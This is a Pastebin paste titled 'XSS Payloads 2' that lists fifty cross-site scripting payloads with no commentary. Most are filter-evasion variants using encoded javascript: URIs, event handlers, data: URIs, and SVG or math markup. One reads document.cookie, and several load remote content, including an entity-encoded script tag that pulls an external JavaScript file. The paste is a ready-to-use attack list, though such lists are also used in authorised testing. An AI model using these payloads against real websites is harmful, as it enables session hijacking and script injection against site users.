Advertisement
Sp4nksta

XSS Payloads 2

Jan 15th, 2014
827
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.67 KB | None | 0 0
  1.  
  2. 1) <a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button>
  3.  
  4. 2) <div onmouseover='alert&lpar;1&rpar;'>DIV</div>
  5.  
  6. 3) <iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
  7.  
  8. 4) <a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a>
  9.  
  10. 5) <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
  11.  
  12. 6) <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
  13.  
  14. 7) <var onmouseover="prompt(1)">On Mouse Over</var>
  15.  
  16. 8) <a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a>
  17.  
  18. 9) <img src="/" =_=" title="onerror='prompt(1)'">
  19.  
  20. 10) <%<!--'%><script>alert(1);</script -->
  21.  
  22. 11) <script src="data:text/javascript,alert(1)"></script>
  23.  
  24. 12) <iframe/src \/\/onload = prompt(1)
  25.  
  26. 13) <iframe/onreadystatechange=alert(1)
  27.  
  28. 14) <svg/onload=alert(1)
  29.  
  30. 15) <input value=<><iframe/src=javascript:confirm(1)
  31.  
  32. 16) <input type="text" value=``<div/onmouseover='alert(1)'>X</div>
  33.  
  34. 17) http://www.<script>alert(1)</script .com
  35.  
  36.  
  37. 18) <iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe>
  38.  
  39. 19) <svg><script ?>alert(1)
  40.  
  41. 20) <iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>
  42.  
  43. 21) <img src=`xx:xx`onerror=alert(1)>
  44.  
  45. 22) <object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
  46.  
  47. 23) <meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>
  48.  
  49. 24) <math><a xlink:href="//jsfiddle.net/t846h/">click
  50.  
  51. 25) <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
  52.  
  53. 26) <svg contentScriptType=text/vbs><script>MsgBox+1
  54.  
  55. 27) <a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a
  56.  
  57. 28) <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
  58.  
  59. 29) <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
  60.  
  61. 30) <script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
  62.  
  63. 31) <script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script
  64.  
  65. 32) <object data=javascript&colon;\u0061&#x6C;&#101%72t(1)>
  66.  
  67. 33) <script>+-+-1-+-+alert(1)</script>
  68.  
  69. 34) <body/onload=&lt;!--&gt;&#10alert(1)>
  70.  
  71. 35) <script itworksinallbrowsers>/*<script* */alert(1)</script
  72.  
  73. 36) <img src ?itworksonchrome?\/onerror = alert(1)
  74.  
  75. 37) <svg><script>//&NewLine;confirm(1);</script </svg>
  76.  
  77. 38) <svg><script onlypossibleinopera:-)> alert(1)
  78.  
  79. 39) <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe
  80.  
  81. 40) <script x> alert(1) </script 1=2
  82.  
  83. 41) <div/onmouseover='alert(1)'> style="x:">
  84.  
  85. 42) <--`<img/src=` onerror=alert(1)> --!>
  86.  
  87. 43) <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>
  88.  
  89. 44) <div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>
  90.  
  91. 45) "><img src=x onerror=window.open('https://www.google.com/');>
  92.  
  93. 46) <form><button formaction=javascript&colon;alert(1)>CLICKME
  94.  
  95. 47) <math><a xlink:href="//jsfiddle.net/t846h/">click
  96.  
  97. 48) <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>
  98.  
  99. 49) <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
  100.  
  101. 50) <a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement